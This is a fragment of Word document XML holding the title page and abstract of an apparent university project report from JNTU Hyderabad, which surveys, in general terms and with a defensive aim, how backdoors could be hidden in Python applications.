          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="385421"/>
          <w:u w:color="385421"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="385421"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Under</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="385421"/>
          <w:spacing w:val="0"/>
          <w:u w:color="385421"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="385421"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="385421"/>
          <w:u w:color="385421"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="385421"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="385421"/>
          <w:spacing w:val="0"/>
          <w:u w:color="385421"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="385421"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="385421"/>
          <w:u w:color="385421"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="385421"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Esteemed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="385421"/>
          <w:spacing w:val="0"/>
          <w:u w:color="385421"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="385421"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="385421"/>
          <w:spacing w:val="0"/>
          <w:u w:color="385421"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="385421"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Guidance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="224"/>
        <w:ind w:left="217" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="385421"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:color="385421"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="385421"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> Prof.Vali Kumari Vatsavayi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="385421"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:color="385421"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="385421"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:drawing xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2232668</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:posOffset>496196</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1084562" cy="1341120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="0" distB="0"/>
            <wp:docPr id="1073741826" name="officeArt object" descr="Image 2"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1073741826" name="Image 2" descr="Image 2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4">
                      <a:extLst/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1084562" cy="1341120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="183" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="DirectorateOfInnovativeLearningTea" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>IRECTORATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>OF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>INNOVATIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>LEARNING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>TEACHING(DILT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 2"/>
        <w:spacing w:before="2" w:line="199" w:lineRule="auto"/>
        <w:ind w:left="888" w:right="1906" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>JAWAHARLAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:spacing w:val="0"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>NEHRU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:spacing w:val="0"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>TECHNOLOGICAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:spacing w:val="0"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">UNIVERSITY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:spacing w:val="0"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>HYDERABAD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="308"/>
        <w:ind w:right="1071"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Formerly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>SCDE_SCHOOL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>CONTINUING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>DISTANCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EDUCATION)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="50"/>
        <w:ind w:right="3034"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kukatpally,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hyderabad, Telangana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>INDIA-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>500085</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="62"/>
        <w:ind w:left="245" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="6e2e9f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:color="6e2e9f"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="6E2E9F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>JULY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="6e2e9f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:color="6e2e9f"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="6E2E9F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="6e2e9f"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:color="6e2e9f"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="6E2E9F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:jc w:val="center"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId5"/>
          <w:footerReference w:type="default" r:id="rId6"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:pgNumType w:start="1"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:before="62"/>
        <w:ind w:left="2934" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1589" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the domain of cybersecurity, the potential for undetectable backdoors within Python applications represents a significant threat. This theoretical study delves into various techniques that can be employed to create such backdoors, which evade traditional detection mechanisms. Python's dynamic nature and rich library ecosystem provide fertile ground for attackers to hide malicious code effectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1589" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1589" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The study explores several obfuscation strategies, including code encryption, polymorphic code generation, and the use of legitimate-looking network communications. Additionally, it examines how Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s built-in functionalities and third-party libraries can be exploited to reduce the backdoor's detectable footprint. Advanced methods such as steganography for data exfiltration and covert communication channels are also discussed, highlighting the evolving nature of these threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1589" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1589" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The primary objective of this paper is to illuminate the potential risks associated with Python-based backdoors and to stress the necessity of comprehensive security practices. These include rigorous code reviews, anomaly detection systems, and behavioral analysis. By understanding these theoretical approaches, cybersecurity professionals can better anticipate, detect, and mitigate sophisticated backdoor threats, thereby enhancing the overall security posture of software systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1589" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1589" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId7"/>
          <w:footerReference w:type="default" r:id="rId8"/>
